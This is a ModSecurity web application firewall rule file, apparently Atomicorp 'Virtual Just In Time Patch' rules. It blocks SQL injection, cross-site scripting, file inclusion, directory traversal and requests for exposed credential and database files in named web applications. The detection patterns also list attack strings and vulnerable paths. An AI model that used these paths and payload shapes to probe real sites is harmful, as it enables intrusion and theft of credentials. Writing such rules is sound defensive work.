SecRule REQUEST_URI "/index\.html" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390488,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nephp Publisher SQL Injection Vulnerabilities'"
SecRule ARGS:id|ARGS:nnet_catid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
# Rule 310019: OpenEdit Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "results\.html" "chain,id:390487,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenEdit Cross-Site Scripting Vulnerability'"
SecRule ARGS:oe-action|ARGS:page "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)"
#Xpoze "reed" SQL Injection Vulnerability
SecRule REQUEST_URI "account/user/mail\.html" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390169, rev:2, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Xpoze reed SQL Injection Vulnerability'"
SecRule ARGS:reed "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
#join.html?jpage
SecRule REQUEST_URI "/join\.html" "chain,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390193,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Join.html file inclusion vulnerability'"
SecRule ARGS:jpage "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
SecMarker END_HTML_JITP
#txt attacks
SecRule REQUEST_URI "@endswith .txt" "id:333885,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309019,t:none,pass,nolog,noauditlog,skipAfter:END_TXT_JITP"
#/data/admin/allowurl.txt
SecRule REQUEST_URI "/data/admin/allowurl\.txt" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:373357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DedeCMSv5 Probe'"
#/revslider/release_log.txt
SecRule REQUEST_URI "/wysija-newsletters\/readme\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311098,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Revslider exploit attempt'"
SecRule REQUEST_URI|ARGS "/wysija-newsletters\/readme\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:310098,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible WYSIJA exploit attempt'"
# Rule 310097: /wwwboard/passwd.txt access
SecRule REQUEST_URI "/wwwboard/passwd\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:310097,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /wwwboard/passwd.txt access'"
# Rule 310184: Ecommerce import.txt access
SecRule REQUEST_URI "/orders/import\.txt" "phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,auditlog,status:403,id:310184,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eCommerce import.txt access attempt'"
# Rule 310202: Ecommerce checks.txt access
SecRule REQUEST_URI "/orders/checks\.txt" "phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,auditlog,status:403,id:310202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Ecommerce checks.txt access attempt'"
# Rule 310019: Simple PHP Blog Exposure of user Credentials
SecRule REQUEST_URI "config/password\.txt" "phase:2,t:none,t:urlDecodeUni,t:lowercase,id:390486,deny,log,auditlog,status:403,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Simple PHP Blog Exposure of user Credentials'"
SecMarker END_TXT_JITP
#/db/valid.users
SecRule REQUEST_FILENAME "db/valid\.users" "phase:2,deny,log,auditlog,status:403,id:312318,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP file manager database access attempt'"
#log disclosure attacks
SecRule REQUEST_FILENAME "logs/sql-error\.log" "phase:2,deny,log,auditlog,status:403,id:312310,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL error log access attempt'"
#db attacks
SecRule REQUEST_FILENAME "@endswith db" "id:333886,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309020,t:none,pass,nolog,noauditlog,skipAfter:END_MDB_JITP"
# Rule 310318: betaparticle blog Discloses Database to Remote users
# and Lets Remote users Upload/delete Arbitrary Files
SecRule REQUEST_URI "database/dbblogmx\.mdb" "phase:2,deny,log,auditlog,status:403,id:310318,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Betaparticle Blog dbBlogMX.mdb database access attempt'"
# Rule 310319: betaparticle blog Discloses Database to Remote users
SecRule REQUEST_URI "/blog\.mdb" "phase:2,deny,log,auditlog,status:403,id:310319,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Betaparticle Blog Blog.mdb database access attempt'"
# Rule 310019: HTMLJunction EZGuestbook Remote Database Disclosure Vulnerability
SecRule REQUEST_URI|ARGS "/datastores/guestbook\.mdb" "phase:2,deny,log,auditlog,status:403,id:390485,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: HTMLJunction EZGuestbook Remote Database Disclosure Vulnerability'"
# Rule 310019: Sukru Alatas Guestbook Exposure of user Credentials
SecRule REQUEST_URI|ARGS "db/gbdb\.mdb" "phase:2,deny,log,auditlog,status:403,id:393485,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sukru Alatas Guestbook Exposure of user Credentials'"
# Rule 310019: uguestbook exploit
SecRule REQUEST_URI "/mdb-database/guestbook\.mdb" "phase:2,deny,log,auditlog,status:403,id:390484,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uguestbook Exposure of user Credentials'"
# Rule 310019: information Call Center "CallCenterData.mdb" Exposure of user Credentials
SecRule REQUEST_URI "callcenterdata\.mdb" "phase:2,deny,log,auditlog,status:403,id:390483,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: information Call Center Exposure of user Credentials'"
# Rule 310019: information Call Center "CallCenterData.mdb" Exposure of user Credentials
SecRule REQUEST_URI "/(?:hsh|hytop)\.mdb" "phase:2,deny,log,auditlog,status:403,id:391487,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Attempted hsh.mdb file access'"
SecMarker END_MDB_JITP
#jsp attacks
SecRule REQUEST_FILENAME "\.jspa?$" "id:333887,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309021,t:none,pass,nolog,noauditlog,skipAfter:END_JSP_JITP"
#/secure/ContactAdministrators!default.jspa
SecRule REQUEST_URI "/secure/contactadministrators\!default\.jspa" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:311299,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Secure Contact Administrators data leak block '"
# Rule 310299: Macromedia SiteSpring XSS
#SecRule REQUEST_URI "cabo/jsps/a\.jsp" # "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,chain,id:311299,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle E-Business Suite 12.1.3 / 12.2.x Open Redirect '"
#SecRule ARGS:redirect "\\" "t:none"
# Rule 310299: Macromedia SiteSpring XSS
SecRule REQUEST_URI "/error/500error\.jsp" "phase:2,deny,log,auditlog,status:403,chain,id:310299,t:none,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Macromedia SiteSpring 500error.jsp cross-site-scripting attempt'"
SecRule ARGS:et "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: ManageEngine netFlow Analyzer "grDisp" Cross-Site Scripting
SecRule REQUEST_URI "/index\.jsp" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:lowercase,id:390482,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ManageEngine netFlow Analyzer Cross-Site Scripting Vulnerability'"
SecRule ARGS:grDisp "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: FileLister "searchwhat" Cross-Site Scripting Vulnerability
SecRule REQUEST_URI "/definesearch\.jsp" "phase:2,deny,log,auditlog,status:403,chain,id:390481,t:none,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FileLister searchwhat Cross-Site Scripting Vulnerability'"
SecRule ARGS:searchwhat "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=)"
SecMarker END_JSP_JITP
#Generic RFI/injection rules
SecRule ARGS|REQUEST_URI "@pm http:// https:// ftp:// ftps:// ogg:// zlib:// gopher:// ../" "id:333888,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309022,t:none,pass,nolog,noauditlog,skipAfter:END_JITP_INJECTION_RULES"
# Rule 310047:General phpbb_root_path vulnerabilities
SecRule ARGS:phpbb_root_path|ARGS:basepath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|^test|\?\?$)" "phase:2,deny,log,auditlog,status:403,id:310047,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic PHP application RFI exploitation attempt',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhiteSpace"
# Rule 310305: b2 arbitrary command execution attempt
SecRule REQUEST_URI "/b2-include/" "phase:2,deny,log,auditlog,status:403,chain,id:310305,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2-include local command execution attempt',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
SecRule REQUEST_URI "b2inc" "chain"
SecRule REQUEST_URI "http"
# Rule 310019: MWChat "config[mwchat_libs]" File Inclusion Vulnerability
SecRule REQUEST_URI "config\[mwchat_libs\]" "phase:2,deny,log,auditlog,status:403,chain,id:390480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MWChat file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_URI "(?:/\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: YaPiG Multiple Vulnerabilities
SecRule ARGS:base_dir "(?:/\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,deny,log,auditlog,status:403,id:390479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yapig remote file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: yawp "_yawp[conf_path]" File Inclusion Vulnerability
SecRule ARGS:_yawp[conf_path] "(?:(?:\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)|(?:\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))" "phase:2,deny,log,auditlog,status:403,id:390478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: yawp file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: PHP iCalendar File Inclusion Vulnerability and XSS
SecRule REQUEST_URI "phpicalendar" "phase:2,deny,log,auditlog,status:403,chain,id:390477,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP iCalendar File Inclusion Vulnerability and XSS',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_URI "cookie_view" "chain"
SecRule REQUEST_URI "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: SocketKB 1.1.x file include Vuln
SecRule REQUEST_URI "\?__f=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,deny,log,auditlog,status:403,id:390476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: Generic BBCodeFile variable remote file include
SecRule ARGS:BBCodeFile "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic BBCodeFile variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: Generic wb_class_dir variable remote file include
SecRule ARGS:wb_class_dir "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390085,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic wb_class_dir variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: Generic component_dir variable remote file include
SecRule ARGS:component_dir "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic component_dir variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: Generic da_path variable remote file include
SecRule ARGS:da_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic da_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Rule 310019: Generic spaw_root variable remote file include
SecRule ARGS:spaw_root "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390088,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic spaw_root variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
# Rule 310019: Generic sitee variable remote file include
SecRule ARGS:sitee "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390089,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic sitee variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
# Rule 310019: Generic root_path variable remote file include
SecRule ARGS:root_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390094,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic root_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
# Rule 310019: Vivvo Article Management classified_path file inclusion
SecRule ARGS:classified_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390105,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vivvo Article Management CMS File Inclusion',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
# Rule 310019: CCleague Pro "language" Parameter Local File Inclusion
SecRule ARGS:language "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CCleague Pro language Parameter Local File Inclusion',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
# Rule 310019: ff_compath remote file inclusion
SecRule ARGS:ff_compath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:394150,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ff_compath File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
# Rule 310019: xcart exploit test
SecRule ARGS:xcart_dir "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,deny,log,auditlog,status:403,id:390166, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: xcart remote include',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
#Honeypot
SecRule ARGS:no_url "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:390204,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: no_url ARG URI injection'"
SecMarker END_JITP_INJECTION_RULES
#Java vulnerabilities
SecRule REQUEST_URI "@pm .sd .do" "id:333889,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309023,t:none,pass,nolog,noauditlog,skipAfter:END_JITP_JAVA"
#Focus on comment argument
# Rule 320013: Java XSS vulnerabilities
SecRule ARGS:description|ARGS:searchtext "(?:\" ?> ?<|iframe|wf_xsrf\.html|@ ?import)" "phase:2,deny,log,auditlog,status:403,id:320013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java XSS vulnerability',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecMarker END_JITP_JAVA
# Rule 310003: phf access
SecRule REQUEST_URI "/phf\?" "phase:2,deny,log,auditlog,status:403,id:310003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phf access',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310004: htsearch arbitrary file read attempt
SecRule REQUEST_URI "/htsearch\?exclude=\`" "phase:2,deny,log,auditlog,status:403,id:310004,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tsearch arbitrary file read attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310011: WEB-PHP phplib remote commanSelective REQUEST_URI|REQUEST_BODY
# attempt
SecRule REQUEST_URI|REQUEST_BODY "_phplib\[libdir\]" "phase:2,deny,log,auditlog,status:403,id:310011,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phplib remote commanSelective REQUEST_URI|REQUEST_BODYd attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310013: Exploit phpBB Highlighting Code Execution Attempt
SecRule REQUEST_URI|REQUEST_BODY "(?:\;|\&)highlight=\'\.(?:system|mysql_query|fwrite\(fopen)\(" "phase:2,deny,log,auditlog,status:403,id:310013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB Highlighting Code Execution Attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310019: alchemy http server prn arbitrary command execution
# attempt
SecRule REQUEST_URI|REQUEST_BODY "/prn/\.\./\.\./" "phase:2,deny,log,auditlog,status:403,id:312019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alchemy http server prn arbitrary command execution attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310021: alchemy http server NUL arbitrary command execution
# attempt
SecRule REQUEST_URI|REQUEST_BODY "/nul/\.\./\.\./" "phase:2,deny,log,auditlog,status:403,id:310021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alchemy http server NUL arbitrary command execution attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310022: AltaVista Intranet search directory traversal attempt
SecRule REQUEST_URI "/query\?mss=\.\." "phase:2,deny,log,auditlog,status:403,id:310022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AltaVista Intranet search directory traversal attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310025:campus attempt
SecRule REQUEST_URI "/campus\?" "phase:2,deny,log,auditlog,status:403,id:310025,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: campus attempt',chain,t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:letter "\.\./\.\."
# Rule 310041:Demarc SQL injection attempt
SecRule REQUEST_URI "/dm/demarc" "phase:2,deny,log,auditlog,status:403,chain,id:310041,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Demarc SQL injection attempt',t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:s_key "'"
# Rule 310042: apache directory disclosure attempt
#SecRule REQUEST_URI "////////" # "id:310042,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: apache directory disclosure attempt',t:none,t:urlDecodeUni"
# Rule 310043: htgrep attempt
SecRule REQUEST_URI "/htgrep" "id:310043,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: htgrep attempt',chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "hdr=/"
# Rule 310044:musicat empower attempt
SecRule REQUEST_URI "/empower\?db=" "id:310044,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: musicat empower attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310052: WEB-PHP strings overflow
SecRule REQUEST_URI|REQUEST_BODY "\?strengur" "id:310052,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: strings overflow',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310080:PHPBB worm sigs
SecRule ARGS:highlight "(?:\x27|%27|\x2527|%2527)" "chain,id:310080,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB worm',t:none,t:lowercase"
SecRule REQUEST_FILENAME "!(\.htm)"
# Rule 310081:Mailto domain search possible MyDoom.M,O
SecRule REQUEST_URI "/search\?hl=en&ie=utf-8&oe=utf-8&q=mailto\+" "id:310081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mailto domain search possible MyDoom.M,O',chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "Host\: www\.google\.com"
# Rule 310082:WEB-PHP EasyDynamicPages exploit
SecRule REQUEST_URI "edp_relative_path=" "id:310082,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyDynamicPages exploit',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
# Rule 310088: BitKeeper arbitrary command attempt
SecRule REQUEST_URI "/diffs/" "id:310088,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BitKeeper arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\'"
# Rule 310092:mailman 2.x path recursion attack
# ZZZZZZZZZZZZZZZZZZZZ
SecRule REQUEST_URI "mailman/private" "chain,id:310092,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mailman 2.x path recursion attack',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\.\.\./\.\.\.\./"
# Rule 310094:Tomcat server snoop access
SecRule REQUEST_URI "/jsp/snp/" "chain,id:310094,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tomcat server snoop access',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\.snp"
# Rule 310098: webplus directory traversal
SecRule REQUEST_URI "/webplus\?script" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:313098,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: webplus directory traversal',chain"
SecRule REQUEST_URI "\.\./"
# Rule 310099: websendmail access
SecRule REQUEST_URI "/websendmail" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: websendmail access'"
SecRule REQUEST_URI "/nph-test-cgi" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: nph-test-cgi access'"
# Rule 310120: htsearch arbitrary configuration file attempt
SecRule REQUEST_URI "/htsearch\?\-c" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310120,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: htsearch arbitrary configuration file attempt'"
# Rule 310122: AltaVista Intranet search directory traversal attempt
SecRule REQUEST_URI "/query\?mss=\.\." "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310122,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AltaVista Intranet search directory traversal attempt'"
# Rule 310153: Honeypot signature.
#SecRule REQUEST_URI|REQUEST_BODY "clamav-partial " # "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: clamav-patial recovery file access attempt',chain"
#SecRule REQUEST_URI|REQUEST_BODY "vi\.recover "
SecRule REQUEST_URI "mode=debug" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310177,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion debug mode access attempt'"
# Rule 310179: Unify eWave ServletExec upload
SecRule REQUEST_URI|REQUEST_BODY "/servlet/com\.unify\.servletexec\.uploadservlet" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310179,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unify eWave UploadServlet abuse attempt'"
# Rule 310203: mall log order access
SecRule REQUEST_URI "/mall_log_files/order\.log" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310203,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mall Log order access attempt'"
# Rule 310205: SWEditServlet directory traversal attempt
SecRule REQUEST_URI "/sweditservlet" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SWEditServlet directory traversal attempt',chain"
SecRule REQUEST_URI "template=\.\./\.\./\.\./"
# Rule 310206: RBS ISP /newuser directory traversal attempt
SecRule REQUEST_URI "/newuser\?image=\.\./\.\." "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310206,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RBS ISP /newuser directory traversal attempt'"
# Rule 310209: Demarc SQL injection attempt
SecRule REQUEST_URI "/dm/demarc" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310209,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Demarc SQL injection attempt',chain"
SecRule REQUEST_URI "\'"
# Rule 310261: WEB-FRONTPAGE .... request
#SecRule REQUEST_URI|REQUEST_BODY "\.\.\.\./" # "id:310261,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WEB-FRONTPAGE directory traversal attempt'"
# Rule 310285: Readfile.tcl Access
SecRule REQUEST_URI "/readfile\.tcl\?file=" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310285,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: readfile.tcl local file access attempt'"
# Rule 310298: mailman XSS
SecRule REQUEST_URI "/mailman/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310298,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mailman cross-site-scripting attempt'"
SecRule ARGS:info "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310304: cross site scripting HTML image tag set to javascript attempt
